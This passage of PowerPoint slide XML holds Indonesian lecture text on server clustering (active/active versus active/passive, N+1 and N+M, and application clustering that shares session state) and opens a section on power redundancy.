              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>karena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terpakai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Cluster </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berarti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kedua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memproses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>koneksi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bersamaan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> administrator </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kapasitas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>maksimum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>perangkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>keras</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersedia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sementara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berfungsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terjadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kegagalan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>gagal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>segera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dialihkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ke</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>saat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beban</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada node yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersisa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tinggi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kinerja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menurun</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Dalam </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>standar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>harus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diimbangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>konfigurasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> N+1 dan N+M yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lebih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sedikit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pasif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> node </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aktif</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengurangi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>biaya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Pengelompokan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Aplikasi</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Clustering juga sangat </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>umum</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menyediakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>layanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>toleran</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>terhadap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Jika server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengalami</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kesalahan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tengah-tengah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, data status </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>akan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>hilang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Clustering </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aplikasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dalam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cluster </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengkomunikasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Sebagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>contoh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pengguna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>masuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>satu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> instance, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>berikutnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dimulai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada instance lain, dan server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>baru</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengakses</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>informasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> lain yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>membuat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> login.</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161</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="217549547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Redundansi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t> Daya</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Semua</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jenis</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memerlukan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>catu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>daya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>stabil</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>beroperasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Peristiwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>listrik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>seperti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lonjakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>lonjakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tegangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>merusak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>peralatan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
